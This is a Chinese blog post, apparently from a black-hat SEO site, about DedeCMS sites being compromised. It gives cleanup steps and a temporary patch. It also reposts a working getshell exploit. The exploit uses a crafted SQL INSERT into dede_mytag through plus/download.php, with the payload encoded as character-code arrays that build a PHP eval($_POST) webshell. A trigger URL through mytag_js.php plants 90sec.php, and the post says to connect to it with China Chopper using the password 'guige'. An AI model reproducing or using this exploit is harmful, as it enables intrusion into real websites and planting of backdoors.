【dedecms数据库dede_mytag漏洞】dede最近被挂马90sec修改管理员等可能0day漏洞修复

原创 SEO培训  2019-08-04 10:04  阅读 4 views 次 评论 0 条

具体不知道哪个文件有问题,初步怀疑是/plus/download.php和mytag_js.php这个文件,反正服务器上DEDECMS的程序网站都被挂马了。 今天发现网站打不开,看网站情况,半夜2点流量高峰,IP为无锡的,重启后网站打开,所有的DEDE后台的网站模版被修改为default,界面乱了,后台增加了service管理员,有的管理员被修改为spider,你登录提示用户名不存在。根目录下增加了asdd.php文件, plus下一堆不明文件,90sec.php,service.php,内容分别为:,根目录下增加了article目录,里面增加了木马生成的一堆赌博网页。 采用其他后台的程序没有被挂马。系统为centos. 首先把模版修改回来吧。 清理方法: 1、删除增加的管理员:service 2、删除根目录的asdd.php 3、删除plus下的download.php,mytag_js.php90sec.php,service.php,vliw.php,vuew.php,digg.php,xiao.php,bakup.php等可疑文件。 4、织梦程序后台病毒扫描都会出现一个plus/90sec.php的文件,得每天删除,可是删除了,第二天就又出现了???可以能是getshell了,可以在后台->模板->自定义宏标记中删除其中的条目之后可以升级下include/dedesql.class.php文件即可. 5、chmod -R 555 xxxx.com/plus,给plus只读权限 6、删除data/cache/mytag-9013.htm 这种类型的所有htm文件,删除tplcache的缓存文件。 发现的越来越多了 7、数据库要清空dede_mytag表 最后备份数据,保险起见,重装下程序吧,漏洞出来N天了,DEDE官方也没见说法,以上综合于网络。 以下是漏洞之处 作者:鬼哥 看贴不回,没JJ 漏洞大家都知道是哪个。 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。 但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。 刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧? getshell 很容易 。 既然刚发出来的是 sql方法getshell  我也看到几个人发了sql增加表mytag的内容。 但是测试了下。。失败 原因: 用的语句是update  很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴  错误。。现在要做的饶过即可。以前也 其实我一直在玩。。郁闷出过那么多dede sql 结合饶过,成功INSERT。 构造语句: mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents("90sec.php","");{/dede:php}') # @`\'`EXP: http://www.xxx.org/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 成功增加。 访问http://www.xxx.org/plus/mytag_js.php?aid=9013 生成一句话木马. 菜刀连接 http://www.xxx.org/plus/90sec.php  密码 guige 测试OK。 临时补丁:不知道别的地方还有没有覆盖变量 反正这个漏洞是修复的 include/dedesql.class.phpif(isset($GLOBALS['arrs1'])){$v1 = $v2 = ";for($i=0;isset($arrs1[$i]);$i++){$v1 .= chr($arrs1[$i]);}for($i=0;isset($arrs2[$i]);$i++){// $v2 .= chr($arrs2[$i]);  //注释这里}$GLOBALS[$v1] .= $v2;} 收 藏

历史上的今天:

本文地址:https://www.dgseo163.com/seos/7716.html
关注我们:请关注一下我们的微信公众号:扫描二维码黑帽seo | SEO技术核心算法培训_黑帽优化实战赚钱技术推广 – 黑桃K的公众号,QQ:1358589665
版权声明:本文为原创文章,版权归 SEO培训 所有,欢迎分享本文,转载请保留出处!

评论已关闭!